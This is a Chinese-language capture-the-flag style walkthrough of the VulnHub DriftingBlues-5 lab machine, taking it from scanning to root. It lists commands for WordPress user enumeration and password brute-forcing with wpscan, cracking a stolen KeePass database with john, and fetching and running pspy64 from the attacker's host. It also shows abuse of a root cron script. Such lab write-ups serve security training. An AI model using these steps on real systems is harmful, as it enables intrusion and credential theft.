目录
3、使用nmap扫描靶机,看有什么服务是可利用的(端口扫描)
环境信息
靶机:DriftingBlues-5,IP地址:192.168.52.151
攻击机:Kali,IP地址:192.168.52.134
下载: https://download.vulnhub.com/driftingblues/driftingblues5_vh.ova
渗透测试
一、信息收集
1、打开kali,查看kali的IP地址和子网掩码
因为靶机和kali现在属于同一个网段,查看kali的IP和子网掩码是为了获得靶机的网段
靶机的网段是:192.168.52.0/24
2、使用netdiscover扫描主机
netdiscover -i eth0 -r 192.168.52.0/24
##netdiscover: -i 指定网卡 -r 指定网段
也可以使用nmap进行主机发现,
nmap -sP 192.168.52.0/24
在使用nmap进行主机发现时,会扫描出本机的IP地址,而netdiscover则不会扫描出本机IP地址
或使用arp-scan -l命令拿到靶机的IP地址
arp-scan -l
获得靶机靶机ip:192.168.52.151
3、使用nmap扫描靶机,看有什么服务是可利用的(端口扫描)
root@kali:~# nmap -sV -A 192.168.52.151
-sV只扫描端口及其版本号
-A扫描端口的详细信息
目标靶机开放了22(SSH服务)、80(HTTP服务)
4、访问网页,查看基本信息
使用Firefox插件Wappalyzer,或者扫描网站目录,查看robots.txt等暴露出的信息,可以获取到网站相关信息
使用浏览器插件Wappalyzer,检测网站的CMS,框架,服务器等信息
可以看出是 wordpress 系统
利用dirsearch进行网站目录扫描:
dirsearch -u 192.168.52.151 -e * -i 200
-i 状态码 只显示该状态码
-x 状态码 不显示该状态码
目录扫描得到wp-login.php登录页面
访问http://192.168.52.151/wp-login.php
5、使用wpscan工具爆破用户名和密码
使用kali的wpscan来扫描一下用户名:
wpscan --ignore-main-redirect --url http://192.168.52.151 --enumerate u --force
wpscan -h可以查看各种参数以及定义,--enumerate 枚举 u 枚举用户名
得到几个用户名:abuzerkomurcu、gill、collins、satanic、gadd,记到 user.txt 中
接着我们使用工具cewl 制作一个名为passwd.txt的字典。
cewl -m 3 -w passwd.txt http://192.168.52.151
接着爆破一下密码:
wpscan --url http://192.168.52.151 -U user.txt -P passwd.txt
爆破成功,获得一组用户名密码:gill:interchangeable
二、漏洞查找与利用
1、发现ssh登录密码
访问:http://192.168.52.151/wp-login.php,登录后台
登录成功,但发现不是管理员,而是一个普通账户
找找其他信息,发现有一张前端没有的图片,感觉比较可疑,把他下载看看
wget http://192.168.52.151/wp-content/uploads/2021/02/dblogo.png
这里使用一个工具exiftool 最新kaili没有得装一个 这个工具用来对EXIF信息解析
apt-get install exiftool
exiftool dblogo.png
最后发现了隐藏得 ssh密码:59583hello
2、进行ssh登录,获得flag1
尝试登入,发现登入成功,获得了第一个flag
ssh gill@192.168.52.151
密码:59583hello
三、提权
1、解密 keepass 数据库获取密码
查看权限:
sudo -l
find / -perm -u=s -type f 2>/dev/null
没发现什么有用的
在家目录下发现了一个 keyfile.kdbx 文件
KDBX文件:由密码管理器KeePass Password Safe创建的文件;存储密码的加密数据库,该数据库只能使用用户设置的主密码进行查看; 用于安全存储Windows,电子邮件帐户,FTP站点,电子商务站点和其他目的的个人登录凭据。
传到 kali 上破解下
python -m SimpleHTTPServer 80
开启临时web服务 发现报错了
那我们就换一种方法:使用scp 这个命令
scp gill@192.168.52.151:/home/gill/key* /root/桌面
将 keyfile.kdbx 内容转为 john 支持的格式:keepass2john keyfile.kdbx > Keepasshash.txt
再使用john破解密码:john --wordlist=rockyou.txt Keepasshash.txt,其中rockyou.txt文件由/usr/share/wordlists/rockyou.zip文件解压得到
最终破解到密码为:porsiempre,试了试切换到root,结果不行
2、利用key.sh定时脚本文件提权,获得flag2
将刚才的keyfile.kdbx文件上传到keeWeb, 输入破解出的密码即可打开
链接:KeeWeb
得到六个类似密码的词条,分别为:
2real4surreal
buddyretard
closet313
exalted
fracturedocean
zakkwylde
尝试利用刚才得到的词条登录root用户,均失败
下载pspy64对进程文件进行监控
下载链接:https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
下载完成后拖入kali,然后kali开启http服务:
python3 -m http.server 8888
靶机下载pspy64:wget http://192.168.52.134:8888/pspy64
chmod 777 pspy64 #给权限
./pspy64 #执行脚本
执行后我们发现在根目录下,每分钟就执行一个key.sh的脚本文件
可以推测: /root/key.sh 脚本会通过计划任务执行,可能会访问 /keyfolder 目录中对应的文件(/keyfolder目录我们可以在根目录发现)
利用刚才在keyfile.kdbx文件中破解出的词条,以破解出的词条为文件名在/keyfolder目录下创建文件
发现什么都没有发生,然后使用rm命令删掉全部后,一个一个的创建,在创建 fracturedocean文件后等待一分钟发现发生了改变:
多了一个 rootcreds.txt 文件,查看后发现密码 imjustdrifting31,应该是 root 的密码,切换到 root,成功得到root权限,获得flag2:
查看key.sh:
参考文章
VulnHub—DriftingBlues: 5
VulnHub—DriftingBlues: 5_kdbx文件怎么打开_小陈是个憨憨的博客-CSDN博客
Vulnhub 靶场 DRIFTINGBLUES: 5